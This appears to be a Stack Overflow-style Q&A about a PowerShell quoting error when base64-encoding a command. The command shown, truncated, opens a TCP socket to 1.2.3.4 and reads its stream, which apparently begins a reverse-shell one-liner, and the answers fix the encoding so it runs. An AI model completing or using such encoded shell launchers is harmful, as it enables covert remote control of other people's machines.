# powershell convert ToBase64String $ string encoding error

Tags: powershell

When I try to convert the following code in powershell:

`[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("**$sm=**(New-Object Net.Sockets.TCPClient('1.2.3.4',21)).GetStream();[byte[]]$b` ..etc ..etc ..etc

the result base64 encoded string execution failed.

I get `"**+** =(New-Object Net.Sockets.TCPClient"` without $sm.

It turns out "+" instead of $sm??

How to encode it in order to include $ into my code to run it properly ?

Comment: its very pathetically formatted. Could you please explain with neat formatting .Even i got tangled while editing.

You are convertting something into base 64. But what is the `$sm` holding as an object? . What is there in `$b` also?

Comment: Use `'` instead of `"` around the string in `GetBytes()`

Comment: `etc. etc.` isn't going to be any good. You're doing an assignment for  `$sm` so the result of that operation would likely be `$True`. Did you try to spread the code instead of doing a one liner to see whenever your other code actually works and gets you the results you're expecting? If you're going to use single quotes be aware that the variables won't be evaluated anymore.

Comment: Mathias R. Jessen you are absolutely right!

Answer (score 0):

Mathias R. Jessen, you are absolutely right!
I have changed a single quote to double inside of code and embraced it with a single quote. 
Thank you!!